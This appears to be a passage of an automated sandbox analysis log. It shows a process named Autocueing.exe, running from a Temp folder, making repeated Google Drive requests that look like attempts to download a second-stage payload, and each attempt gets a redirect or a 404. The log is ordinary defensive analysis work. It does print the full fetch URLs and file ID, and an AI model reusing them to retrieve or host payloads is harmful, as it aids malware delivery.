                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-uoo09eQ9ZSxNdT26A887Hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                    35 | 192.168.2.6 | 50020 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                    2025-01-11 04:28:42 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:42 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgQjEfiC34FFgvbldZVzkNM8SdDcyeU9WwPbnC0tT-a_HHKqPBMFTQ9zZ_bS-46aJy3VkkbndnU
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:42 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce--AE7jvXM4bG0xUBd2gWfgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:42 UTC  1652               IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gJa4DyuugV2HEtMnuQrdoA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                                    36          192.168.2.6  50021        142.250.185.142  443               5140  C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                                                    2025-01-11 04:28:43 UTC  417                OUT        GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:43 UTC  1920               IN         HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:43 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-tOV3uhpaLsNjK1ZgoGDdTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                                    37          192.168.2.6  50022        142.250.185.129  443               5140  C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                                                    2025-01-11 04:28:44 UTC  459                OUT        GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:45 UTC  1851               IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC41tdIZqWj2bJ9wxsCGeSj8fxuPMMV2NO7OKsxb5MghtivueGKB1A7M3sQkj3p39owpTNbcoms
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:44 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-07V-w6NUHALSx7f_8lMhig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:45 UTC  1652               IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5Cvn4rPczBzt7i4uYBTBZQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                                    38          192.168.2.6  50023        142.250.185.142  443               5140  C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                                                    2025-01-11 04:28:45 UTC  417                OUT        GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:46 UTC  1920               IN         HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:46 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-WTooALJ87U39Y2nEmPBnzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                                    39          192.168.2.6  50024        142.250.185.129  443               5140  C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                                                    2025-01-11 04:28:47 UTC  459                OUT        GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:47 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgReaQ4vW_gm9KMDtxSwu4swMG04TGFzMfNO1Rw_TIwdOy7lJOY50G1hHo2_tQIgGCh-
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:47 GMT
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-NZxBQpieEWax83cT-Pyptg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:28:47 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="w7vNZC_E_yQ_ZB9bGmpayg">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.6 | 50025 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:48 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:48 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:48 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-Mo7sk0WyFmFbNbGeBICsOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.6 | 50026 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:49 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:49 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgRkmIAMlVcYHpK3iY-s1TKO0mVvpYHIJDELoOBL8JBsuWXHBJbAISvxi0jw8C5Q56RO
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:49 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-G17mHrrdCPJTaSnUkjj-Rg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:28:49 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Od4Fy3M8vijxXjUOwW5tzA">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.6 | 50027 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:50 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:51 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
